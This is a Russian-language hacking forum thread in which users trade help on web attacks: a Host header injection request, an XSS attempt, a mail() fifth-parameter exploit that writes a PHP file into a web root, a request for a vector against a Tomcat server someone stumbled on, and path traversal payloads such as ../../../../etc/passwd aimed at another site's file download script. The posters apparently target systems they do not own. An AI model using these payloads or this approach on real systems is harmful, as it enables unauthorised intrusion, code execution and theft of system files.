Немогу некак понять Host Header Atack что я не совал в Host: ничего не меняется в [SERVER_NAME] и [HTTP_HOST] инструкцию брал Code: https://habrahabr.ru/post/166855/
Чтоб одна из переменых [SERVER_NAME] и [HTTP_HOST] поменялась на ok.ru как на фото С https://habrahabr.ru/post/166855/ Code: Оправляем GET http://site.dev/phpinfo.php HTTP/1.1 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Charset:windows-1251,utf-8;q=0.7,*;q=0.3 Accept-Language:ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cache-Control:max-age=0 Connection:keep-alive Host:~%#$^&*()<>?@\!."'{}[]=+| Referer:http://site.dev/index.htm User-Agent:TelnetTest И смотрим: _SERVER["SERVER_NAME"]: ~%#$^&*()<>?@\!."'{}[]=+| _SERVER["HTTP_HOST"]: ~%#$^&*()<>?@\!."'{}[]=+|
https://vlevit.org/ru/blog/tech/host-spoofing-prevention http://rus-linux.net/MyLDP/server/securing-apache-part-5-http-message-architecture.html http://nginx.org/en/docs/http/request_processing.html
Годно. Побольше бы таких гайдов по бурпу. Программа многофункциональная. С одной теорией мне лично сложновато понять полный функционал. Особенно фаззинг и так далее...
Так есть же гайд по бурпу https://forum.antichat.ru/threads/servis-staty-po-realpazam.452520/#post-4124151
Делаю простую XSS которая внедряется но выдает ошибку в Console Code: Uncaught ReferenceError: PROMPT is not defined at profile:107
У меня такои сплоит не работает https://xakep.ru/2017/01/12/phpmailer-exploit/ или в новои версии PHP исправили? Code: <?php mail("pes@localhost", "CheckOneTwo", "Hello!", "", "-OQueueDirectory=/tmp/ -X/home/cafeperspectiva/public_html/1.php"); ?>
да но дело не в phpmailer а в функцыии mail() которую он вызывает, и 5 параметр, выходит что такои php фаил должен создать мне фаил 1.php
Наткнулся на одном сервере на Apache Tomcat 8.5.23 - перед глазами страница с радостной надписью, что сервер успешно установлен. Доступ к Code: /manager/html /host-manager/html /manager/status Заблочен - я так понял по быстрому чтению доков - заблочен из коробки во имя безопасности. Но чутью зверя подсказывает, что нерадивый одмен забыл/забил на конфигурацию и как-то это можно раскрутить. Можно ли, уважаемые знатоки? Прошу вектор.
Товарищи, помогите пллз. Есть урл site,com/download_file.php?path=xxxxxxx/65/1 где x-разные циферки в зависимости от того, что вводишь, скачиваются либо разные пдфки, либо пустой файл download_file.php, но наверняка же можно и чего-нибудь интересное скачать. как можно поискать закономерности в этом цифровом path?)
site,com/download_file.php?path=../../../../../etc/passwd site,com/download_file.php?path=file:///etc/passwd site,com/download_file.php?path=http://site.ua site,com/download_file.php?path= итд
ессно я сразу же это попроовал) я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...
